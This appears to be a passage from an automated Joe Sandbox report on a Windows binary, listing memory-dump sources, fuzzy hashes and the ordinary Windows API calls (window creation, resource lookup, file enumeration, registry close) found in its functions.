                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 6a05e92a76c8c5ca9a0a769a5f5d4cc643f426d809164ab351f81e2bf9eae797
                                                                                              • Instruction ID: 97e62bb5cb5176d189c6cd675d589d9c7a8179aa92c1a68fb220006335a56f75
                                                                                              • Opcode Fuzzy Hash: 6a05e92a76c8c5ca9a0a769a5f5d4cc643f426d809164ab351f81e2bf9eae797
                                                                                              • Instruction Fuzzy Hash: 15212472900219ABCF06DF58D4819EE7BB9FF48354F10406AED01AB241D778AE48CBA4
                                                                                              APIs
                                                                                              • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00458BBD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 35e1d86da7a2f004a6cc6ac27d4f5fb8925abfabb8f493127d4efe08fda53b48
                                                                                              • Instruction ID: cf859b758ff2acc04b1ecd057fffe6232e3ddb52d8bbd9ecb225a9b44f51b97d
                                                                                              • Opcode Fuzzy Hash: 35e1d86da7a2f004a6cc6ac27d4f5fb8925abfabb8f493127d4efe08fda53b48
                                                                                              • Instruction Fuzzy Hash: E731BB75A00219AFCF01DFA8C845ADEBBF5FF0C314B00446AF918E7210EB35AA519FA5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Parent
                                                                                              • String ID:
                                                                                              • API String ID: 975332729-0
                                                                                              • Opcode ID: 5d60539e9fe0d6b5907cec7b90cc82e219825c6b1399d7bebee3bb11f346e87e
                                                                                              • Instruction ID: fd93277a5edab1037254a445adec77899b11dd427d2650e9889f3dc849f96d9e
                                                                                              • Opcode Fuzzy Hash: 5d60539e9fe0d6b5907cec7b90cc82e219825c6b1399d7bebee3bb11f346e87e
                                                                                              • Instruction Fuzzy Hash: 450161752106066B9F205E72DC94E7B7BAEEFC5366B004726FC11C3293E639DC149674
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00460C6A
                                                                                                • Part of subcall function 004609B0: TlsAlloc.KERNEL32(?,00460C94,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845,76F90A60,00000000,?,00448293,00000000), ref: 004609D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocH_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3910492588-0
                                                                                              • Opcode ID: 285b6ccc489d41c5de9a0535a65a64457fa7c9c7f49d3a8658ee213dc17cba7c
                                                                                              • Instruction ID: a0d859e667a0056672296448471ca11741ce94952222560437a9cc5b95dec7d2
                                                                                              • Opcode Fuzzy Hash: 285b6ccc489d41c5de9a0535a65a64457fa7c9c7f49d3a8658ee213dc17cba7c
                                                                                              • Instruction Fuzzy Hash: 59014B75601211DBDB2ABF65E81176A77B2EBD0365F20853FE49193390EB789C00CB69
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4c95f913305d500bfc32bbbbee7193a633c0b3a4e4670fac29b056f2bae1782f
                                                                                              • Instruction ID: bb3e69d15d780de53330c5d6d72164c4e0a011380651103a9525379e83ea7078
                                                                                              • Opcode Fuzzy Hash: 4c95f913305d500bfc32bbbbee7193a633c0b3a4e4670fac29b056f2bae1782f
                                                                                              • Instruction Fuzzy Hash: 97F0123240431DBB8F125E91BC01DEF3B69AF09362F0084B6FD1555112C739DE25DBAA
                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(?,?,00000006), ref: 004011F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: FindResource
                                                                                              • String ID:
                                                                                              • API String ID: 1635176832-0
                                                                                              • Opcode ID: a58b1a04dc1bea75977a2527b1b1ca33b918ea6efbe7517a5065409332ed68fe
                                                                                              • Instruction ID: 6dc988b005b8fc30f393fd8110b3f372d9b25c0a2933f789efa7e0433c938865
                                                                                              • Opcode Fuzzy Hash: a58b1a04dc1bea75977a2527b1b1ca33b918ea6efbe7517a5065409332ed68fe
                                                                                              • Instruction Fuzzy Hash: 2ED0C2262000203AD111261A7C009BB739CCBC5B75F01803FF981E6250D2749C4391B1
                                                                                              APIs
                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,00000013,00000013,00000000), ref: 004056B0
                                                                                                • Part of subcall function 00405260: FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirstFolderPathSpecial
                                                                                              • String ID:
                                                                                              • API String ID: 4139272456-0
                                                                                              • Opcode ID: e16a5da9c176f5747fdebabd61ae748e4b25d777e391b108598e2ecd6b42360c
                                                                                              • Instruction ID: b5141f72a04271b27f2cd416eb66c2580eae33dfd44c725751d1776040a00473
                                                                                              • Opcode Fuzzy Hash: e16a5da9c176f5747fdebabd61ae748e4b25d777e391b108598e2ecd6b42360c
                                                                                              • Instruction Fuzzy Hash: B7E092312083006AE324A710DC12FEB7B94EB44B10F40442DF5849A1C0DAB985448B8A
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(004D986C,?), ref: 0045FE46
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: ExchangeInterlocked
                                                                                              • String ID:
                                                                                              • API String ID: 367298776-0
                                                                                              • Opcode ID: 2bc2abf03f5655f9ba68e80518b30cb0f363e765179325703fd4d0107c92acbe
                                                                                              • Instruction ID: bc49aa0d4d948be67f9690471510b8ed3888739c125ddbc330b2db5705a8ca27
                                                                                              • Opcode Fuzzy Hash: 2bc2abf03f5655f9ba68e80518b30cb0f363e765179325703fd4d0107c92acbe
                                                                                              • Instruction Fuzzy Hash: 07E0DF35100A008FD321AF6D940899AB7E0EF89320312046FF451C7331CB3488018B06
                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,00001307,?,?), ref: 00454A64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: fd5ad6ed7d118575d801198fe39bceee9a7f057f70ad30e4d98d39196487485f
                                                                                              • Instruction ID: c409d0f2698309086833104a9a61d1fa4173a06d7f66be008a515749cb0ecf84
                                                                                              • Opcode Fuzzy Hash: fd5ad6ed7d118575d801198fe39bceee9a7f057f70ad30e4d98d39196487485f
                                                                                              • Instruction Fuzzy Hash: 82E07EB590020EAFCB41DFA8D94199E7BF8FB08304F108166F955E7351E770EA629FA1
                                                                                              APIs
                                                                                              • MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Message
                                                                                              • String ID:
                                                                                              • API String ID: 2030045667-0
                                                                                              • Opcode ID: 59faccf43a043a13470f99c3d54ef39fe2c79f88222e295741fce528b2289a15
                                                                                              • Instruction ID: 5178b5a0b41d74c9b106dcd966956f425ffcdcf2aff4cd00589aa289ec05536c
                                                                                              • Opcode Fuzzy Hash: 59faccf43a043a13470f99c3d54ef39fe2c79f88222e295741fce528b2289a15
                                                                                              • Instruction Fuzzy Hash: B6E08C32614251AF8B28CF24A800D7B73A4BB84301B4A481FB84283121D725CC048756
                                                                                              APIs
                                                                                              • IsDialogMessageA.USER32(?,?), ref: 00459823
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogMessage
                                                                                              • String ID:
                                                                                              • API String ID: 547518314-0
                                                                                              • Opcode ID: 1ffd83f6f69bfcf00c757c45a5924acd9a7cd19483080faaa8b4761980219d67
                                                                                              • Instruction ID: 950d9a05d3075b4753071b1ad27fd3419ca856100382ac3c2366567b47a6deba
                                                                                              • Opcode Fuzzy Hash: 1ffd83f6f69bfcf00c757c45a5924acd9a7cd19483080faaa8b4761980219d67
                                                                                              • Instruction Fuzzy Hash: 62E08C35104241DBCB156B58C808ACABBE6AF4A311B0189AAF48683632C7B59C94DB95
                                                                                              APIs
                                                                                              • RegCloseKey.KERNEL32(00000000,?,00402F00), ref: 004305AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 74364db6edf65ac1cded7dca93091c5e8858f5bf4cced24a346546391798bd62
                                                                                              • Instruction ID: c7aa091f4a726c5968189d3feb802f8af7120f8bec3dfa8e5ccd4f51a11cb400
                                                                                              • Opcode Fuzzy Hash: 74364db6edf65ac1cded7dca93091c5e8858f5bf4cced24a346546391798bd62
                                                                                              • Instruction Fuzzy Hash: A7C012311281214ADB709E7CB80478132D8AB58711F11056AF481C3240E264C8824694
                                                                                              APIs
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00459898
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: TextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 530164218-0
                                                                                              • Opcode ID: 413112a5c85e39164c15968a7be78b297692ec4c01c10a6d7691b3f161ac27a9
                                                                                              • Instruction ID: ce08906d4c308bcf959607817f9718b1f7e877e17a9a83edb3ef6e712208b152
                                                                                              • Opcode Fuzzy Hash: 413112a5c85e39164c15968a7be78b297692ec4c01c10a6d7691b3f161ac27a9
                                                                                              • Instruction Fuzzy Hash: C9D0CA70210100DFCB80EF01DA88B11B7B1BF5034AF6088FAE6484A262DB339C57DF05
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: c0e18a481122150143b8f281ff93b5c012e2675f0dd0cd29fdf8a5e77acdfeda
                                                                                              • Instruction ID: 422d110c87409b42cc3d40fc4940c954b3565e0feb40eec272749ef0314fdf92
                                                                                              • Opcode Fuzzy Hash: c0e18a481122150143b8f281ff93b5c012e2675f0dd0cd29fdf8a5e77acdfeda
                                                                                              • Instruction Fuzzy Hash: 72D0CA74200200EFCB80DF00D848B22BBB1AF5030AF2088EEE6454A262DB338C97DF06
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,?,00455C74,00000000,0000E146,00000000,?,?,00402EB7), ref: 00459912
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: a9d97b9b013e5985470218459d1a2f55a5a072b57367bd69c52fcefe32dd499f
                                                                                              • Instruction ID: e981d7f3aa070d6dd922208303280657e88cd7f5e4e9c7b1544f0cb6238b2e4d
                                                                                              • Opcode Fuzzy Hash: a9d97b9b013e5985470218459d1a2f55a5a072b57367bd69c52fcefe32dd499f
                                                                                              • Instruction Fuzzy Hash: 03D0CA70200200EFCB40DF10E808B25B7B2BB9430AF2088EEE6000A26AD7338C17EF06